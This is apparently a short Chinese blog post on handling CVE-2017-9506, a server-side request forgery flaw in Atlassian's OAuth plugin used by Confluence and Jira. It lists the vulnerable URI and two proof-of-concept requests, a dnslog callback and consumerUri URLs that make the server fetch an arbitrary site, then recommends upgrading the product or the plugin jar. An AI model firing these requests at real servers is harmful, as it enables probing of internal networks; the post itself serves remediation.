confluence/jira漏洞处理CVE-2017-9506

                               创建:2022年7月22日 更新:2022年7月22日 83点热度 0人点赞 0条评论

漏洞详情

参考地址:https://www.cve.org/CVERecord?id=CVE-2017-9506
漏洞URI:/plugins/servlet/oauth/users/icon-uri?consumerUri=xxx
漏洞版本:atlassian-oauth-service-provider-plugin的版本对于2.0.4
产品范围:此漏洞为atlassian产品的jar版本问题,只要是处于以上版本的产品均有风险,如wiki/jira

POC1

使用dnslog,如下图,在末尾处添加dnslog地址后访问,即可查询出相关的记录


公共dnslog服务:http://www.dnslog.cn/

POC2

直接添加任意地址,可以访问到此站点,如下:

https://wiki.xxx.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com
https://jira.xxx.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com

结果会访问到相关的地址的内容,等于是做了一层代理

解决

此问题已经较早,有成熟的解决方案,升级相关的产品版本解决。但如果不想升级整个产品版本,则可以只升级相关的jar包

参考文档
https://jira.atlassian.com/browse/CONFSERVER-53362?attachmentSortBy=dateTime
https://confluence.atlassian.com/confkb/how-to-clear-confluence-plugins-cache-297664846.html

yuc

这个人很懒,什么都没留下

error: Content is protected !!